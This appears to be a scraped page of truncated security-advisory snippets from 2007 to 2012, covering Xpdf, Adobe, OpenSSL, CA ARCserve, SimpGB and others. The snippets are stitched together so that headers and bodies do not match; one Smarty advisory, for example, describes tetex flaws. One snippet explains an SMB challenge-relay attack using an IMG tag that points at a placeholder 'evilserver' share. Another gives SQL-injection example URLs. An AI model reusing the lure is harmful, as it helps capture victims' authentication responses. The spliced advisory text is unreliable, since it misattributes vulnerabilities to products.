<< Previous Next >>
multiple
From: Alex Legler [mailto:a3li@gentoo.org]
Sent: 02 June 2010 22:18
To: gentoo-announce@gentoo.org
Cc: bugtraq@securityfocus.com; full-disclosure@lists.grok.org.uk;
security-alerts@linuxsecurity.com
Subject: [ GLSA 201006-13 ] Smarty: Multiple vulnerabilities
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 201006-13
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
Affected: Corporate 4.0
_______________________________________________________________________
Problem Description:
Multiple vulnerabilities has been discovered and fixed in tetex:
Multiple buffer overflows in the JBIG2 decoder in Xpdf 3.02pl2
and earlier allow remote attackers to cause a denial of service
(crash) via a crafted PDF file, related to (1) setBitmap and (2)
readSymbolDictSeg (CVE-2009-0146).
(ii) An attacker A connects to system S and sends mutiple 'SMB
Negotiate Protocol Request' packets with the 'Flags2' field set to
0xc001 to obtain several challenges, and stores them. The attacker A
then forces a user U on system S to connect to his own specially crafted
SMB server, for example by sending an email with multiple <IMG> tags
with UNC links (e.g.: <IMG SRC=\\evilserver\share\a.jpg>) or a link to
web server with similar <IMG> tags. Upon receiving the connections from
system S,the attacker's SMB server will respond with the previously
obtained challenges and will store the corresponding responses returned
by the remote system. Attacker A has now a set of responses which are
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Severity: Normal
Title: Adobe Flash Player: Multiple vulnerabilities
Date: January 03, 2010
Bugs: #296407
ID: 201001-02
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Severity: Normal
Title: OpenSSL: Multiple vulnerabilities
Date: December 01, 2009
Bugs: #270305, #280591, #292022
ID: 200912-01
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
phpCollegeExchange 0.1.5c Multiple SQL Injection Vulnerabilities
Name phpCollegeExchange
Vendor http://phpcollegeex.sourceforge.net
Versions Affected 0.1.5c
Author Salvatore Fresta aka Drosophila
Website http://www.salvatorefresta.net
Contact salvatorefresta [at] gmail [dot] com
Date 2009-12-11
1 app-text/acroread < 8.1.6 >= 8.1.6
Description
===========
Multiple vulnerabilities have been reported in Adobe Reader:
* Alin Rad Pop of Secunia Research reported a heap-based buffer
overflow in the JBIG2 filter (CVE-2009-0198).
* Mark Dowd of the IBM Internet Security Systems X-Force and Nicolas
http://www.debian.org/security/ Noah Meyerhans
May 05, 2009 http://www.debian.org/security/faq
- ------------------------------------------------------------------------
Package : xpdf
Vulnerability : multiple
Problem type : local (remote)
Debian-specific: no
CVE Id(s) : CVE-2009-0146 CVE-2009-0147 CVE-2009-0165
CVE-2009-0166 CVE-2009-0799 CVE-2009-0800
CVE-2009-1179 CVE-2009-1180 CVE-2009-1181
http://www.debian.org/security/ Noah Meyerhans
May 06, 2009 http://www.debian.org/security/faq
- ------------------------------------------------------------------------
Package : kdegraphics
Vulnerability : multiple
Problem type : local (remote)
Debian-specific: no
CVE Id(s) : CVE-2009-0146 CVE-2009-0147 CVE-2009-0165
CVE-2009-0166 CVE-2009-0799 CVE-2009-0800
CVE-2009-1179 CVE-2009-1180 CVE-2009-1181
FormMail 1.92 Multiple Vulnerabilities
Name Multiple Vulnerabilities in FormMail
Systems Affected FormMail 1.92 and possibly earlier versions
Severity Medium
Impact (CVSSv2) Medium 4.3/10, vector: (AV:N/AC:M/Au:N/C:P/I:N/A:N)
Vendor http://www.scriptarchive.com/formmail.html
Advisory http://www.ush.it/team/ush/hack-formmail_192/adv.txt
Authors Francesco "ascii" Ongaro (ascii AT ush DOT it)
Giovanni "evilaliv3" Pellerano (evilaliv3 AT ush DOT it)
Hash: SHA1
Core Security Technologies - CoreLabs Advisory
http://www.coresecurity.com/corelabs/
VNC Multiple Integer Overflows
1. *Advisory Information*
Title: VNC Multiple Integer Overflows
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Cisco Security Advisory: Multiple Vulnerabilities in the Cisco ACE
Application Control Engine Module and Cisco ACE 4710 Application
Control Engine
Document ID: 109450
Advisory ID: cisco-sa-20090225-ace
Title: CA ARCserve Backup Multiple Vulnerabilities
CA Advisory Date: 2008-10-09
Reported By:
Haifei Li of Fortinet's FortiGuard Global Security Research Team
Title: CA Service Desk Multiple Cross-Site Scripting
Vulnerabilities
CA Advisory Date: 2008-09-24
Reported By:
Open Security Foundation
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Severity: Normal
Title: Adobe Flash Player: Multiple vulnerabilities
Date: April 18, 2008
Bugs: #204344
ID: 200804-21
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Hash: SHA1
Core Security Technologies - CoreLabs Advisory
http://www.coresecurity.com/corelabs
Multiple vulnerabilities in Google's Android SDK
*Advisory Information*
Title: Multiple vulnerabilities in Google's Android SDK
Application: BolinOS
Versions Affected: 4.6.1
Vendor URL: http://www.bolinos.com
Bugs: Local File Include,Multiple XSS, System information disclosure
Exploits: YES
Reported: 13.03.2008
Second report: 18.03.2008
Vendor response: none
Solution: none
Title: [CAID 35724, 35725, 35726]: CA BrightStor ARCserve Backup
Multiple Vulnerabilities
CA Vuln ID (CAID): 35724, 35725, 35726
CA Advisory Date: 2007-10-10
CA Advisory Updated: 2007-12-05
Reported By:
CVE-2007-1659
Unmatched \Q\E sequences with orphan \E codes can cause the compiled
regex to become desynchronized, resulting in corrupt bytecode that may
result in multiple exploitable conditions.
CVE-2007-1660
Multiple forms of character class had their sizes miscalculated on
initial passes, resulting in too little memory being allocated.
XSS is possible via Username form field.
Additional information (in Ukranian): http://websecurity.com.ua/1269/
Original message (in Russian): http://securityvulns.ru/Rdocument875.html
3. durito [NGH Group] reports multiple SQL injections in ActiveKB 1.5
Example:
http://www.example.com/activekb/index.php?ToDo=browse&catId=[SQL]
http://www.example.com/activekb/admin/index.php?ToDo=hideQuestion&questId=[SQL]
Title: [CAID 35724, 35725, 35726]: CA BrightStor ARCserve Backup
Multiple Vulnerabilities
CA Vuln ID (CAID): 35724, 35725, 35726
CA Advisory Date: 2007-10-10
Reported By:
Anonymous researcher working with the iDefense VCP (CVE-2007-5325)
Title: [CAID 35673, 35674, 35675, 35676, 35677]: CA ARCserve
Backup for Laptops and Desktops Multiple Server Vulnerabilities
CA Vuln ID (CAID): 35673, 35674, 35675, 35676, 35677
CA Advisory Date: 2007-09-20
Reported By: Sean Larsson (VeriSign iDefense Labs)
anonymous researcher working with the iDefense VCP
netVigilance Security Advisory #66
SimpGB version 1.46.02 Information Disclosure Vulnerability
Description:
SimpGB is a guestbook with data stored in MySQL, administration interface and support for multiple languages. Features: Data stored in MySQL, Administration interface, Support for multiple languages, Support for multiple instances in one database, Support for multiple layouts, Own header/footer can be defined, Support of BBCode and smilies, Admin can decide which BBCode tags to enable, Avatars (with option to let users upload their own), Admin can decide which input fields to display and which of them are required, Admins can write comments on posts, Admins can mark entry as "always on top", Admins can attach file to entry, flood protection, IP banlist, bad word list, send email notification upon new posts, optionally validate new posts before they get visible by public, own leadtext for entry form and own "Thank you" message can be defined, Option to mark posts as private (only admins can see them), search entries, Option to let users send emails out of guestbook.
External References:
Mitre CVE: ID requested but no answer received
NVD NIST: ID requested but no answer received
OSVDB: ID requested but no answer received
netVigilance Security Advisory #65
SimpGB version 1.46.02 File Content Disclosure Vulnerability
Description:
SimpGB is a guestbook with data stored in MySQL, administration interface and support for multiple languages. Features: Data stored in MySQL, Administration interface, Support for multiple languages, Support for multiple instances in one database, Support for multiple layouts, Own header/footer can be defined, Support of BBCode and smilies, Admin can decide which BBCode tags to enable, Avatars (with option to let users upload their own), Admin can decide which input fields to display and which of them are required, Admins can write comments on posts, Admins can mark entry as "always on top", Admins can attach file to entry, flood protection, IP banlist, bad word list, send email notification upon new posts, optionally validate new posts before they get visible by public, own leadtext for entry form and own "Thank you" message can be defined, Option to mark posts as private (only admins can see them), search entries, Option to let users send emails out of guestbook.
External References:
Mitre CVE: ID requested but no answer received
NVD NIST: ID requested but no answer received
OSVDB: ID requested but no answer received
Affected: Enterprise Server 5.0
_______________________________________________________________________
Problem Description:
Multiple vulnerabilities has been found and corrected in ocsinventory:
Multiple cross-site scripting (XSS) vulnerabilities in
ocsreports/index.php in OCS Inventory NG 1.02.1 allow remote attackers
to inject arbitrary web script or HTML via (1) the query string, (2)
the BASE parameter, or (3) the ega_1 parameter. NOTE: some of these
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Severity: Normal
Title: Chromium: Multiple vulnerabilities
Date: December 17, 2010
Bugs: #325451, #326717, #330003, #333559, #335750, #338204,
#341797, #344201, #347625, #348651
ID: 201012-01
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256
Cisco Security Advisory: Multiple Vulnerabilities in Cisco
TelePresence Endpoint Devices
Advisory ID: cisco-sa-20110223-telepresence-cts
Revision 1.0
3. Problem Description
a. ESX third party update for Service Console kernel
The ESX Service Console Operating System (COS) kernel is updated to
kernel-2.6.18-274.3.1.el5 to fix multiple security issues in the
COS kernel.
The Common Vulnerabilities and Exposures project (cve.mitre.org) has
assigned the names CVE-2011-0726, CVE-2011-1078, CVE-2011-1079,
CVE-2011-1080, CVE-2011-1093, CVE-2011-1163, CVE-2011-1166,
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
ESA-2012-014: RSA enVision Multiple Vulnerabilities
EMC Identifier:ESA-2012-014
CVE Identifiers: CVE-2012-0399, CVE-2012-0400, CVE-2012-0401,
CVE-2012-0402, CVE-2012-0403
Title:
======
Car Portal CMS v3.0 - Multiple Web Vulnerabilities
Date:
=====
2012-04-24
<<Previous Next>>
|
